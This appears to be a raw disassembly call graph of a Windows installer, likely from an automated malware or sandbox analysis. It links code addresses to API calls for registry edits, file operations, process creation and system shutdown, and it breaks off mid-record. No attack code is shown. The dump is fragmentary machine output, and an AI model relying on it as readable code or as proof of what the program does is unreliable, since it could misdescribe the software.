40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 